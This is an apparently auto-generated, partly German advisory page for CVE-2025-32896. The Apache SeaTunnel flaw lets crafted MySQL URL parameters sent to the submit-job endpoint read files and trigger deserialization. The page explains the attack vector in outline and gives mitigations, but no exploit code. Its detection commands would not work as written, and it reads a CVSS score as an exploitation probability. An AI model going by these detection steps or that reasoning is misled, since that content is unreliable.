Plattform
java
Komponente
org.apache.seatunnel:seatunnel-engine-server
Behoben in
2.3.11
2.3.11
CVE-2025-32896 describes an Arbitrary File Read and Deserialization vulnerability discovered in Apache SeaTunnel. This vulnerability allows unauthorized users to perform malicious actions by exploiting the /hazelcast/rest/maps/submit-job endpoint. The vulnerability impacts versions of Apache SeaTunnel up to and including 2.3.9, and a fix is available in version 2.3.11.
An attacker can leverage this vulnerability to read arbitrary files from the SeaTunnel server's file system. By manipulating extra parameters within the MySQL URL during job submission, they can trigger deserialization of malicious objects, potentially leading to remote code execution. The blast radius extends to any data accessible by the SeaTunnel process, and successful exploitation could compromise the entire system. This vulnerability shares similarities with other deserialization vulnerabilities where attackers can inject malicious code through crafted input.
This CVE was published on 2025-06-19. No public proof-of-concept (PoC) code has been released at the time of writing. The vulnerability is not currently listed on the CISA KEV catalog. The CVSS score of 2.5 indicates a low probability of exploitation, but the potential impact warrants prompt remediation.
Organizations using Apache SeaTunnel for data integration and transformation pipelines, particularly those relying on the /hazelcast/rest/maps/submit-job endpoint for job submission, are at risk. Environments with weak access controls or legacy configurations are especially vulnerable.
• linux / server:
journalctl -u seatunnel -g "arbitrary file read"• java / supply-chain: Inspect SeaTunnel job submissions for unusual MySQL URL parameters. Look for patterns indicative of file path manipulation. • generic web:
curl -I /hazelcast/rest/maps/submit-job | grep -i 'content-type: application/json'Check for unexpected content types in the response, which might indicate a deserialization attempt.
disclosure
Exploit-Status
EPSS
0.19% (41% Perzentil)
The primary mitigation is to upgrade Apache SeaTunnel to version 2.3.11 or later. This version includes a fix that addresses the vulnerability. As an interim measure, consider disabling the /hazelcast/rest/maps/submit-job endpoint if it's not essential. Enabling restful api-v2 and enforcing HTTPS two-way authentication will further restrict access and reduce the attack surface. Review and restrict access to the SeaTunnel environment, limiting user privileges to the minimum necessary.
Actualice Apache SeaTunnel a la versión 2.3.11 o superior. Además, habilite la API RESTful v2 y configure la autenticación HTTPS bidireccional para mitigar la vulnerabilidad.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2025-32896 is a LOW severity vulnerability affecting Apache SeaTunnel versions up to 2.3.9, allowing unauthorized users to read arbitrary files and potentially execute code through the submit-job API.
You are affected if you are using Apache SeaTunnel version 2.3.9 or earlier. Upgrade to version 2.3.11 to resolve the issue.
Upgrade to Apache SeaTunnel version 2.3.11. Additionally, enable restful api-v2 and HTTPS two-way authentication for enhanced security.
There is currently no confirmed evidence of active exploitation, but the potential impact warrants prompt remediation.
Refer to the Apache SeaTunnel project's security announcements for the official advisory: [https://seatunnel.apache.org/docs/security/](https://seatunnel.apache.org/docs/security/)
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.
Lade deine pom.xml-Datei hoch und wir sagen dir sofort, ob du betroffen bist.